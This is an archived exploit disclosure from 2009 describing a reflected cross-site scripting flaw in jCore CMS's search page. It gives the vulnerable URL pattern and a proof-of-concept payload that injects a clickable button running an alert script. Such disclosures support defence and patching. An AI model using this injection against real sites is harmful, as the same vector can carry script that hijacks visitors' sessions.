[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : jCore CMS Cross Site Scripting Vulnerability
# Published : 2009-12-17
# Author : loneferret
# Previous Title : eWebquiz v8 Blind SQL Injection Vulnerability
# Next Title : Piwik Open Flash Chart Remote Code Execution Vulnerability
Found: loneferret
Vendor: jCore
Site: http://www.jcore.net/home
Software link: http://www.jcore.net/downloads
Search page is vulnerable to cross-site scripting.
Exploit:
http://server/modules/search?search=[xss here]
http://server/modules/search?search=</a>[xss here]
Example:
The result page will screw up. Hit the back button and you newly created
submit input type will be there. Fully functional.
http://server/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">